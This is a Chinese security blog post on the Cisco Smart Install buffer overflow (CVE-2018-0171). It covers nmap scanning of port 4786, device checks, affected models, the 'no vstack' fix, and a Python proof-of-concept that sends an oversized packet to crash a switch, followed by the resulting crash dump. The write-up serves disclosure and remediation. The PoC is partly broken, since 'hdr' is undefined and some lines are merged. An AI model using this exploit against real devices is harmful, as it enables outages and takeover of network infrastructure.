zoukankan      html  css  js  c++  java
  • Cisco Smart Install远程命令执行漏洞

     

     

    0x01前言

    Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种即插即用的配置和图像管理功能,可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置,将其安装到网络中,然后启动,无需其他配置要求。因此它可以完全控制易受攻击的网络设备。Smart Install是一种即插即用的配置和图像管理的功能,为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化,并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是,该功能在默认情况下客户端上是启用了的。

     

    0x02漏洞描述

    思科 IOS IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞(CVE-2018-0171)。攻击者可以远程向 TCP 4786 端口发送一个恶意数据包,利用该漏洞,触发目标设备的栈溢出漏洞造成设备拒绝服务(DoS)或在造成远程命令执行,攻击者可以远程控制受到漏洞影响的网络设备。据悉,思科交换器 TCP 4786 端口是默认开放的

    0x03检查漏洞

    1.如果您的思科网络设备开放了TCP 4786端口,则易受到攻击,为了找到这样的设备,只需通过nmap扫描目标网络。

    nmap -p T:4786 192.168.1.0/24

    2.要检查网络设备是否开放了Smart Install Client客户端功能,以下示例是在显示配置为Smart Install ClienCisco Catalyst交换机上的show vstack config命令输出:

    switch1# show vstack config
     Role: Client (SmartInstall enabled)
     .
    switch2# show vstack config
     Capability: Client
     Oper Mode: Enabled
     Role: Client

    来自show vstack config命令输出的RoleClientOper ModeEnabledRoleClient(已启用SmartInstall信息确认设备上已启用了该功能。

    3.思科机子上执行命令判断,开放了4786端口即使用了SMI

    switch>show tcp brief all
    
    TCBLocal Address           Foreign Address        (state)
    
    0344B794*.4786                  *.*                    LISTEN
    
    0350A018*.443                   *.*                    LISTEN
    
    03293634*.443                   *.*                    LISTEN
    
    03292D9C*.80                    *.*                    LISTEN
    
    03292504*.80                    *.*                    LISTEN

    Cisco IOSiex软件版本检查:

    Router> show version
    
    Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
    
    Technical Support: http://www.cisco.com/techsupport
    
    Copyright (c) 1986-2015 by Cisco Systems, Inc.
    
    Compiled Mon 22-Jun-15 09:32 by prod_rel_team
    
    ios-xe-device# show version
    
    Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
    
    Technical Support: http://www.cisco.com/techsupport
    
    Copyright (c) 1986-2016 by Cisco Systems, Inc.
    
    Compiled Sun 27-Mar-16 21:47 by mcpre

    4.如果您不确定您的漏洞是否受到影响,可以使用CiscoCisco IOS Software Checker进行检测:
    https://tools.cisco.com/security/center/softwarechecker.x

    5.使用下面的脚本探测对应IP端口是否确实开放的是思科SMI协议

    https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

    协议特征可以参见msf扒拉出来的

    https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d

    # python smi_check.py -i targetip
    
    [INFO] Sending TCP probe to targetip:4786
    
    [INFO] Smart Install Client feature active on targetip:4786
    
    [INFO] targetip is affected

     

    0x04 影响范围


    影响设备:
    Catalyst 4500 Supervisor Engines
    Cisco Catalyst 3850 Series Switches
    Cisco Catalyst 2960 Series Switches

    包含部分Smart Install Client的设备也可能受到影响:
    Catalyst 4500 Supervisor Engines
    Catalyst 3850 Series
    Catalyst 3750 Series
    Catalyst 3650 Series
    Catalyst 3560 Series
    Catalyst 2960 Series
    Catalyst 2975 Series
    IE 2000
    IE 3000
    IE 3010
    IE 4000
    IE 4010
    IE 5000
    SM-ES2 SKUs
    SM-ES3 SKUs
    NME-16ES-1G-P
    SM-X-ES3 SKUs

     

     

    0x05 漏洞验证

    以下是此漏洞验证的PoC

    # smi_ibc_init_discovery_BoF.py
    
    import socket 
    
    import struct 
    
    from optparse import OptionParser 
    
     
    
    # Parse the target options 
    
    parser = OptionParser() 
    
    parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")  parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)  (options, args) = parser.parse_args() 
    
     
    
    def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): 
    
        return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v 
    
     
    
    def send_packet(sock, packet): 
    
        sock.send(packet)  
    
     
    
    def receive(sock):  
    
        return sock.recv() 
    
     
    
    if __name__ == "__main__": 
    
     
    
        print "[*] Connecting to Smart Install Client ", options.target, "port", options.port 
    
     
    
        con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    
        con.connect((options.target, options.port)) 
    
     
    
        payload = 'BBBB' * 44  shellcode = 'D' * 2048 
    
     
    
        data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload 
    
     
    
        tlv_1 = craft_tlv(0x00000001, data)  tlv_2 = shellcode 
    
     
    
        pkt = hdr + tlv_1 + tlv_2 
    
     
    
        print "[*] Send a malicious packet"  
    
        send_packet(con, pkt)

     

    要攻击交换机,则运行以下命令:

    host$ ./smi_ibc_init_discovery_BoF.py-t 192.168.1.1

    在交换机上应显示崩溃信息并重新启动:

     

    00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240
    
    -Traceback= 42424240
    
    Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
    
    === Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:
    
    ...
    
    Queued messages:
    
    Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE
    
    (fc3)
    
    Technical Support: http://www.cisco.com/techsupport
    
    Copyright (c) 1986-2016 by Cisco Systems, Inc.
    
    Compiled Wed 17-Aug-16 13:46 by prod_rel_team
    
    Instruction TLB Miss Exception (0x1200)!
    
    SRR0 = 0x42424240  SRR1 = 0x00029230  SRR2 = 0x0152ACE4  SRR3 = 0x00029230
    
    ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x84000000  DBSR = 0x00000000
    
    CPU Register Context:
    
    Vector = 0x00001200  PC = 0x42424240  MSR = 0x00029230  CR = 0x33000053
    
    LR = 0x42424242  CTR = 0x014D5268  XER = 0xC000006A
    
    R0 = 0x42424242  R1 = 0x02B1B0B0  R2 = 0x00000000  R3 = 0x032D12B4
    
    R4 = 0x000000B6  R5 = 0x0000001E  R6 = 0xAA3BEC00  R7 = 0x00000014
    
    R8 = 0x0000001E  R9 = 0x00000000  R10 = 0x001BA800  R11 = 0xFFFFFFFF
    
    R12 = 0x00000000  R13 = 0x00110000  R14 = 0x0131E1A8  R15 = 0x02B1B1A8
    
    R16 = 0x02B1B128  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x02B1B128
    
    R20 = 0x02B1B128  R21 = 0x00000001  R22 = 0x02B1B128  R23 = 0x02B1B1A8
    
    R24 = 0x00000001  R25 = 0x00000000  R26 = 0x42424242  R27 = 0x42424242
    
    R28 = 0x42424242  R29 = 0x42424242  R30 = 0x42424242  R31 = 0x42424242
    
    Stack trace:
    
    PC = 0x42424240, SP = 0x02B1B0B0
    
    Frame 00: SP = 0x42424242    PC = 0x42424242

     

     

    0x06 漏洞修复

    #conf t

    Enter configuration commands, one per line.  End with CNTL/Z.

    NSJ-131-6-16-C2960_7(config)#no vstack 

    NSJ-131-6-16-C2960_7(config)#exit

    关键的就是这句 no vstack 

     

    再看,端口已经关掉了。

    #show tcp brief all 

    TCB       Local Address           Foreign Address        (state)

    075A0088  *.443                   *.*                    LISTEN

    0759F6C8  *.443                   *.*                    LISTEN

    0759ED08  *.80                    *.*                    LISTEN

    0759E348  *.80                    *.*                    LISTEN

     

     

    0x06 漏洞危害

    可能会导致攻击者在受影响的设备上导致缓冲区溢出,这可能会产生如下影响:

    触发设备的重新加载

    允许攻击者在设备上执行任意代码

    在受影响的设备上引发无限循环重启,是设备崩溃

     

    0x07 漏洞修复

    #conf t

    Enter configuration commands, one per line.  End with CNTL/Z.

    NSJ-131-6-16-C2960_7(config)#no vstack 

    NSJ-131-6-16-C2960_7(config)#exit

    关键的就是这句 no vstack 

     

    再看,端口已经关掉了。

    #show tcp brief all 

    TCB       Local Address           Foreign Address        (state)

    075A0088  *.443                   *.*                    LISTEN

    0759F6C8  *.443                   *.*                    LISTEN

    0759ED08  *.80                    *.*                    LISTEN

    0759E348  *.80                    *.*                    LISTEN

     

    0x08 参考文献

    https://embedi.com/blog/cisco-smart-install-remote-code-execution/

    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

    https://www.anquanke.com/post/id/103122

    https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w

    https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99

    https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be

  • 相关阅读:
    laydate指定日期不可选
    kindeditor上传及播放视频的问题
    【Mood】八上期末考
    关于Java注解(annotation)的简单理解
    关于RabbitMQ的简单理解
    关于MongoDB的简单理解(三)--Spring Boot篇
    关于MongoDB的简单理解(二)--Java篇
    关于linux系统密码策略的设置(转载)
    mysq 报错, sql语句在数据库里运行正常, 在内网测试正常,打包放外网的时候就报下面错误
    java mybatisplus+springboot服务器跨域问题
  • 原文地址:https://www.cnblogs.com/backlion/p/8675854.html
Copyright © 2011-2022 走看看